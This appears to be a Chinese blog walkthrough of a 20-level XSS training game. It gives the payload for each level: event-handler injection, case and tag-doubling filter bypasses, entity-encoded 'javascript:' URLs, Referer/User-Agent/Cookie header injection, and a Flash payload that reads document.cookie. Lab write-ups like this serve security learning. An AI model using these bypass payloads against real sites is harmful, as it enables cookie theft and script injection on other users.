XSS小游戏的通关之路

最新推荐文章于 2023-02-04 11:57:54 发布
最新推荐文章于 2023-02-04 11:57:54 发布
阅读量608 收藏
点赞数
分类专栏: Web安全 文章标签: xss php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/samlirongsheng/article/details/104818918
版权

1.开始

<script>alert('a')</script>

<script>alert(1)</script>

<script>confirm("完成的不错!")</script> <script>prompt("完成的不错!")</script>

 

2.注意闭合

test"> <script>alert('1')</script>

test"><script>confirm("完成的不错!")</script> test"><script>prompt("完成的不错!")</script>

 

3.尖括号被过滤,用事件来触发,单引号闭合

' oninput=alert`1` // ' oninput=alert`1` ' ' onchange=alert`1` // ' onchange=alert`1` '

' onclick='window.alert()

 

来源: http://www.runoob.com/jsref/event-oninput.html

oninput 事件

实例

当用户向 <input> 中尝试输入时执行 JavaScript:<input type="text" οninput="myFunction()">

定义和用法

oninput 事件在用户输入时触发。

该事件在 <input> 或 <textarea> 元素的值发生改变时触发。

提示: 该事件类似于onchange 事件。不同之处在于 oninput 事件在元素值发生变化是立即触发, onchange 在元素失去焦点时触发。另外一点不同是 onchange 事件也可以作用于 <keygen> 和 <select> 元素。

 

4.跟第三关一样,只是闭合换成双引号

" oninput=alert`1` //

 

5.看源码,把on替换成了o_n;script替换成了sc_ript

意思就是不用事件和script

"> <a href="javascript:alert(/1/)">click me</a> //

生成一个跳转连接

 

6.主要是大小写问题,可以用大小写绕过技术

"> <Script>alert('handsome boy')</script> // "> <img Src=x OnError=alert('xss')> //

为什么第五关不能用大小写绕过,查看源码,发现调用下面函数,

 

7.用null代替常见字符

<?php

ini_set("display_errors", 0);

$str =strtolower( $_GET["keyword"]);

$str2=str_replace("script","",$str);

$str3=str_replace("on","",$str2);

$str4=str_replace("src","",$str3);

$str5=str_replace("data","",$str4);

$str6=str_replace("href","",$str5);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level7.php method=GET>

<input name=keyword value="'.$str6.'">

<input type=submit name=submit value=搜索 />

</form>

</center>';

?>


" oonninput=alert(1) "

"> <scscriptript>alert`xss`</scscriptript> //

 8.过滤了:",src,on,script,data测试代码:

"'%&#></script><p class="onmouseover=" onmouseover="xx" onxxx="">xxx</p>


<input name=keyword value="&quot;'%&amp;#&gt;&lt;/script&gt;&lt;pclass=&quot;onmouseover=&quot; onmouseover=&quot;xx&quot; onxxx=&quot;&quot;&gt;xxx&lt;/p&gt;">

利用代码为:javascript:alert(1)

可以用十六进制转换来绕过过滤;

javasc&#x72;ipt:alert(1)

 

9.多了下面一句,检测URL合法性

if(false===strpos($str7,'http://'))

{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
javascript:alert(1) //http://

javasc&#x72;ipt:alert(1)//http://

 

10.过滤“<”,">"尖括号

尖括号被过滤,第一考虑事件型来触发XSS

看源码

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

$str11 = $_GET["t_sort"];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form id=search>

<input name="t_link" value="'.'" type="hidden">

<input name="t_history" value="'.'" type="hidden">

<input name="t_sort" value="'.$str33.'" type="hidden">

</form>

</center>;

?>

发现除了keyword,还接受t_sort参数,虽然keyword没有过滤<>,但是不关他鸟事啊。。。

再往后看,t_sort type="hidden",所以构造的时候要带上type="text",显示文本内容

?keyword=12&t_sort="; type="text" onclick="alert(111)

?keyword=12&t_sort="; type="text" onmouseover="alert(111)

前后对比

 

11.插Referer

 

再结合源码

$str = $_GET["keyword"];

$str00 = $_GET["t_sort"];

$str11=$_SERVER['HTTP_REFERER'];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

...

<input name="t_ref" value="'.$str33.'" type="hidden">

同样的过滤了<>,跟第十关一样,也可以自己构造Referer

Referer:12&t_sort="; type="text" onclick="alert(111)

 

12.插USER_AGENT

与11一样

 

13.插Cookie

同样,但是要注意参数名字为user,注意构造的语句闭合问题。

" type="text" οnclick="alert(111)

借助F12,来fuzz,查看接收和过滤的字符。

 

14.图片的EXIF信息渲染解析导致XSS

查看源码得知,嵌入了一个iframe页面,访问这个网站http://www.exifviewer.org/,是查看图片的EXIF信息的网站,说明这是文件上传图片的XSS。

此题的网站已关闭;

可参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0194934.html

 

15.AngularJS ng-include指令

15的正确访问链接如下;

http://127.0.0.1/xss/level15.php?src=1.gif

ng-include 指令用于包含外部的 HTML 文件。

包含的内容将作为指定元素的子节点。

ng-include 属性的值可以是一个表达式,返回一个文件名。

默认情况下,包含的文件需要包含在同一个域名下。

'level4.php?keyword=%22%20οnfοcus=alert(1)%20%22'

网上查是这个playload,但是不成功;以前也没有遇到过这种,暂时解不出来。

 

16.过滤script、空格、/

用%0d换行符绕过

playload:<img%0Dsrc=1%0Dοnerrοr=alert(1)>

 

17.过滤<>

但是输入的内容在embed标签中,<embed> 标签定义嵌入的内容,比如插件;

利用事件标签来触发,onmousedown、onfocus等都可以,但是不知道为什么onclick不可以。

playload:arg01=a&arg02=b οnfοcus=alert(1)

两个参数均可。

 

18.跟17一样

arg01=a&arg02=b οnfοcus=alert(1)

我这边测试跟17一摸一样,但是网上说只有第一个参数生效,只是看php的源码看不出区别,貌似跟flash有关,也就是源码里的几个swf文件,太菜,不懂。

 

19.flash xss

参考:http://blog.icxun.cn/note/308.html playload:arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E

 

20.依旧不懂

playload:

arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height

sam.li
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS挑战小游戏
qq_25899635的博客
10-10 633
** XSS小游戏 找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 ** lvevel1: 通过查看右边源码发现$str从url接收一个get型name参数,且并没有进行任何过滤...
XSS-通关小游戏(1-20
热门推荐
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS? 1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5747
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
XSS闯关小游戏通关笔记
skynet_x的博客
10-29 1205
level1 — 无过滤 查看源码,没有任何的过滤。 直接在链接中构造最基本的XSS弹窗即可,弹窗内容为123. <script>alert(123)</script> level2 — input中未设置过滤 查看源码,发现在echo输出中有一个函数htmlspecialchars() htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。可以看成是对特定字符的过滤。 预定义的字符是: & (和号)成为 & " (双引号)成为 "
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
xss源码小游戏.rar
07-09
在这个“xss源码小游戏”中,你将有机会深入理解和实践XSS攻击的基本原理和防御方法。下面,我们将详细探讨XSS的相关知识点。 一、XSS类型 XSS通常分为三种类型: 1. 存储型XSS:恶意脚本被存储在服务器端,然后在...
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
Web安全之XSS攻击与防御小结
02-23
恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击...
2022-渗透测试-xss小游戏通关
保持微笑的博客
01-25 4894
这是一个在线靶场-xss小游戏通关,一共6关。链接地址: XSS game (xss-game.appspot.com)https://xss-game.appspot.com/登陆成功后,页面如下。 第一关:Hello, world of XSS 第一关没有对输入的字符串进行任何的过滤,我们可以在漏洞的窗体或直接在输入栏输入特定的恶意url以之行你想要的JavaScript脚本。 <script>alert('123');</script> 第二关:Persi.
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS-过关小游戏(1-9)
qq_45791294的博客
03-27 250
触发alert()完成关卡。 1. <script>alert()</script> 2. 先测试一下 ctrl + u 查看源代码 观察第17行,闭合第17行即可插入alert "><script>alert()</script> 3. 测试,查看源代码 'onclick = 'alert() onclick:当按钮被点击时执行Javascript代码,这里是为输入框加了onclick,所以访问之后需要点击一
xss通关小游戏~你的纵享丝滑
xinyue9966的博客
01-25 1971
xss-labs简言下载链接Level 1 基本命令Level 2 黑名单绕过Level 3 单引号绕过Level 4 双引号绕过Level 5 过滤鼠标事件Level 6 大小写绕过Level 7 双写绕过Level 8 编码绕过Level 9 检测httpLevel10 修改隐藏标签Level11 http头部注入Level12 User-Agent注入Level13 Cookie注入Level14 乌云漏洞Level15 Include文件包含Level16 %0a、%0d绕过Level17 on事件
XSS闯关小游戏
weixin_42728957的博客
12-07 3505
最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: level1 登录页面: 查看代码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; ech
做了一个XSS的闯关游戏,攻略贴上来
yd0str
12-13 8769
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 444
XSS闯关小游戏(level1~13)
XSSxss-labs小游戏闯关
Z_David_Z的博客
01-25 872
XSS闯关小游戏前言0X01 实验介绍0X02 实验目的下载链接第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关第十三题第十四关第十五关第十六关第十七关第十八关第十九关第二十关总结 前言 0X01 实验介绍 为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS原理: 恶意web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页
XSS实战训练————XSS小游戏闯关录(下)
Fly_鹏程万里
12-12 2549
Level 11 特点:通过Referer来实现xss攻击,相当于一个post型的XSS攻击 level 11.php 通过查看代码可以发现str11=_SERVER[‘HTTP_REFERER’];,而由于keyword、t_sort都是经过实体编码输出的,所以也就基本上失去了xss的希望,那么我们就可以考虑一下str11了,我们通过构造referer的payload实现xss攻击...
xss闯关游戏
weixin_44512852的博客
03-03 1943
** xss tv 题目1-6 ** 1:http://test.xss.tv/level1.php?name=test &amp;amp;amp;amp;amp;amp;lt;svg/alert(1)&amp;amp;amp;amp;amp;amp;gt; 2:http://test.xss.tv/level2.php?keyword=test 闭合掉双引号 on事件:” onclick=alert(1)&amp;amp;amp;amp;amp;amp;gt; “ onmouse
dvwa xss小游戏
最新发布
07-09
dvwa是一个非常流行的Web安全教程平台,其中包含了一个名为XSS(Cross-Site Scripting,跨站脚本攻击)的小游戏部分。这个小游戏的设计目的是让学习者亲身体验和理解XSS漏洞。在游戏中,玩家通常需要在输入框中插入特定的代码片段,以触发服务器返回含有恶意脚本的结果,进而展示对网站安全性的影响。 在这个过程中,学习者可以了解到如何构造注入恶意HTML或JavaScript代码,以及浏览器是如何渲染和执行这些代码的。通过这种方式,他们能够提升防止XSS攻击的安全意识和技术能力。玩dvwa XSS小游戏可以帮助新手程序员了解防御此类常见Web漏洞的基本策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值